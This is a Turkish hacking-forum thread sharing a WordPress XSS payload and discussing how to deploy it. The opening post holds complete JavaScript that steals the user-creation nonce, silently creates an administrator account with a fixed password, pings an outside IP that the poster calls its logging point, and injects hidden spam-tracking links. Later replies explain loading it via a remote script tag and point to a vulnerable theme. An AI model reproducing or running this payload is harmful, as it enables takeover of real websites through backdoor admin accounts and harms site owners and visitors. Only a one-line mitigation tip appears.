Forum
Aktif konular
Üyeler
Kurallar
Arama
Tahribat.com Forumları 
Hertürlü Web tabanlı Saldırı Taktik ve Stratejileri 
Wordpress Xss Açığı İle Admin Ekleme Wordpress Xss Açığı İle Admin Ekleme
-
Kod
gotome(); checkmeone(); function putmeone() { var site = extractSummary(document.head.innerHTML); if(site == "null") { return; } var newuser_url = site+"wp-admin/user-new.php"; var ajax_url = site+"wp-admin/admin-ajax.php"; var _td = " var $ = jQuery.noConflict(); $.ajax({ "url": newuser_url, "success" : function(html){ /*console.log("Getting Nonce");*/ var re = /name="_wpnonce_create-user"([ ]+)value="([^"]+)"/g; if(html.indexOf("_wpnonce_create-user") !== -1) { var m = re.exec(html); if (m[2].match(/([a-z0-9]{10})/)) { var nonce = m[2]; $.ajax({ "url": newuser_url, "method" : "POST", "data" : { "action":"createuser", "_wpnonce_create-user": nonce, "_wp_http_referer" : "/wp-admin/user-new.php", "user_login": "simple001", "email" : "simple@simplesite.com", "first_name" : "simple", "last_name" : "simple", "url" : "http://simple.com/", "pass1" : "passforme1", "pass1-text" : "passforme1", "pass2" : "passforme1", "send_user_notification" : 0, "role":"administrator", "createuser" : "Add+New+User" }, "success" : function(html){ //console.log("New User created"); //Removeing the XSS from the site, callback hell $.ajax({ "url": ajax_url, "method" : "POST", "data" : { "action":"fake", "permalink_structure": 1 }, "success": function(){ //Resed dome, reload the page httpGet("http://146.185.182.176/g/a.php"); //window.location = window.location + '&reload=1'; } }); } }); } } } });"; eval(_td); } function httpGet(theUrl) { var xmlHttp = new XMLHttpRequest(); xmlHttp.open( "GET", theUrl, false ); xmlHttp.send( null ); return xmlHttp.responseText; } function extractSummary(iCalContent) { var rx = /href="(.*)wp-content/g; if(iCalContent.indexOf("/wp-content/") !== -1) { var arr = rx.exec(iCalContent); return arr[1]; } return "null"; } function checkmeone() { var site = extractSummary(document.head.innerHTML); if(site == "null") { return 0; } var newuser_url = site+"v"; var ajax_url = site+"wp-admin/admin-ajax.php"; eval("var $ = jQuery.noConflict(); $.ajax({ "url": newuser_url, "success" : function(html){ var re = /name="_wpnonce_create-user"([ ]+)value="([^"]+)"/g; if(html.indexOf("_wpnonce_create-user") !== -1) { putmeone(); } else { getmeone(); } }, "fail" : function() { getmeone(); } });"); } function getcookone() { if (document.cookie.indexOf("checkmeonce=") >= 0) { } else { var now = new Date(); now.setTime(now.getTime() + 1 * 3600 * 1000 * 10); document.cookie = "checkmeonce="+"=5464; expires=" + now.toUTCString() + "; path=/"; return 1; } return 0; } function getmeone() { if(getcookone() == 1) { gotome(); } } function gotome(){ var ulink = "https://for.stringengines.com/sp.php?at=57&bc=345&rps=5467854&sty=457&get=75"; //document.location.href = ulink; //window.location.href = ulink; document.write("<div style='position:absolute;left:-4637px'><a href='//www.liveinternet.ru/click;trafficbetter' "+ "target=_blank><img src='//counter.yadro.ru/hit;trafficbetter?t45.6;r"+ escape(document.referrer)+((typeof(screen)=="undefined")?"": ";s"+screen.width+"*"+screen.height+"*"+(screen.colorDepth? screen.colorDepth:screen.pixelDepth))+";u"+escape(document.URL)+ ";h"+escape(document.title.substring(0,150))+";"+Math.random()+ "' alt='' title='LiveInternet' "+ "border='0' width='31' height='31'><\/a><\/div>") }http://146.185.182.176/g/a.php buradaki logladığı yer
-
Paylaşım için teşekkürler hocam.
-
Bunu nasıl kullanıyoruz hocam? İlgili alanları doldurup herhangi bir hostta çalıştırıyor muyuz? Çalıştırında bilgilerini girdiğimiz kullanıcı hedef sitede mi oluşuyor
-
Bir cizik yeter sevgilim
-
Yazilimci bunu yazdı
Bunu nasıl kullanıyoruz hocam? İlgili alanları doldurup herhangi bir hostta çalıştırıyor muyuz? Çalıştırında bilgilerini girdiğimiz kullanıcı hedef sitede mi oluşuyor
<script src="http://seninsite.com/xss.js"></script> yukarıdaki kodu javascript olarak çağırıyorsun okadar xss açığı hakkında bilgi sahibi olman gerek tabi
-
hocam valla eline sağlık belki kendi yazıyorsun belki başka yeren alıp paylaşıyorsun ama şu tbt deki çoğu adminden daha yararlısın eline koluna sağlık...
-
Hacı abi hangi sürümler de var
-
nereodi bunu yazdı
Hacı abi hangi sürümler de var
http://wphutte.com/education-wp-3-0-6-1-unauthenticated-theme-options-overwrite-or-stored-xss/
genellikle tema fonksiyonlarında var kernel de çıkanları hemen fixliyorlar.
-
KaptaN bunu yazdı
hocam valla eline sağlık belki kendi yazıyorsun belki başka yeren alıp paylaşıyorsun ama şu tbt deki çoğu adminden daha yararlısın eline koluna sağlık...
işe yarayan şeyler hakkında ip ucu veriyorum hani sitem hacklendi virüs girdi olaylarının nedenleri bunlar
-
EcHoLL bunu yazdıKaptaN bunu yazdı
hocam valla eline sağlık belki kendi yazıyorsun belki başka yeren alıp paylaşıyorsun ama şu tbt deki çoğu adminden daha yararlısın eline koluna sağlık...
işe yarayan şeyler hakkında ip ucu veriyorum hani sitem hacklendi virüs girdi olaylarının nedenleri bunlar
bahsettiğin konulara mesela bu konua önlemi almak içinde bilgi versen daha güzel olur bence .
-
KaptaN bunu yazdıEcHoLL bunu yazdıKaptaN bunu yazdı
hocam valla eline sağlık belki kendi yazıyorsun belki başka yeren alıp paylaşıyorsun ama şu tbt deki çoğu adminden daha yararlısın eline koluna sağlık...
işe yarayan şeyler hakkında ip ucu veriyorum hani sitem hacklendi virüs girdi olaylarının nedenleri bunlar
bahsettiğin konulara mesela bu konua önlemi almak içinde bilgi versen daha güzel olur bence .
tarayıcı ile sitene admin olarak girdiğinde javascripti kapatırsan bir işe yaramaz
Kısayol
Şikayet
Özel Mesaj
Alıntı yap
Cevapla